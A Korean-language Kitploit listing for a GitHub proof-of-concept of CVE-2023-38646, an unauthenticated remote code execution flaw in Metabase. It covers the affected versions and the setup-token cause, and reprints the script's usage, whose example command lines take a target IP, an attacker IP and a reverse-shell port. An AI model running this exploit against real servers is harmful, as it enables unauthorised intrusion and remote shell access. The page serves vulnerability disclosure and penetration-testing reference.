Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-38646 — Metabase 오픈 소스 0.46.6.1 이전 버전과 Metabase Enterprise 1.46.6.1 이전 버전은 공격자가 서버의 권한 수준으로 서버에서 임의의 명령을 실행할 수 있게 합니다. 악용에는 인증이 필요하지 않습니다. 기타 수정된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 및 1.43.7.2입니다. | Kitploit
도구/GitHubGitHub/ego1stoo/cve-2023-38646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubego1stoo/cve-2023-38646

CVE-2023-38646

Metabase 오픈 소스 0.46.6.1 이전 버전과 Metabase Enterprise 1.46.6.1 이전 버전은 공격자가 서버의 권한 수준으로 서버에서 임의의 명령을 실행할 수 있게 합니다. 악용에는 인증이 필요하지 않습니다. 기타 수정된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 및 1.43.7.2입니다.

저장소 보기
132년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-38646 Metabase 사전 인증 RCE (2023년 11월 26일)

Metabase 오픈 소스 0.46.6.1 이전 버전 및 Metabase Enterprise 1.46.6.1 이전 버전에서는 공격자가 서버의 권한 수준으로 서버에서 임의의 명령을 실행할 수 있습니다. 악용에는 인증이 필요하지 않습니다. 기타 수정된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 및 1.43.7.2입니다.

이 취약점은 애플리케이션이 api/setup/validate 내에서 데이터베이스의 유효성을 검사하는 데 사용할 수 있는 setup-token을 노출할 때 발생합니다. 인증되지 않은 사용자는 악성 코드를 생성하고 임의의 명령을 실행할 수 있습니다.

Disclaimer

사용에 따른 책임은 본인에게 있습니다

이 스크립트는 교육 및 테스트 목적으로 제공됩니다. 작성자는 이 스크립트의 사용으로 인한 오용 또는 손해에 대해 책임을 지지 않습니다. 관련 법률 및 윤리 기준을 준수해야 합니다. 이 스크립트를 사용함으로써 귀하는 이러한 조건을 인정하고 동의하게 됩니다.

Metabase

Metabase는 다양한 데이터베이스 및 데이터 소스의 데이터를 사용하여 차트와 대시보드를 생성할 수 있는 오픈 소스 비즈니스 인텔리전스 도구입니다. GitHub에서 33,000개 이상의 스타를 보유한 인기 프로젝트이며, 지난 몇 년 동안 취약점 연구 관점에서 상당한 조사를 받아 왔습니다.

개념 증명

명령어

usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            show this help message and exit
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Hostname of the target.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port of the Target Machine (default: Port 80)
  -p PORT, --port PORT  Port for reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Your IP Adress

아래 명령을 사용하여 스크립트를 실행할 수 있습니다. -rp를 사용하여 원격 포트를 변경할 수 있습니다. 기본 포트는 80입니다.

./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

image

취약한 버전

Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

참고 자료

  • Packet storm security Metabase-Remote-Code-Execution
  • NVD CVE-2023-38646 세부 정보
도구 다운로드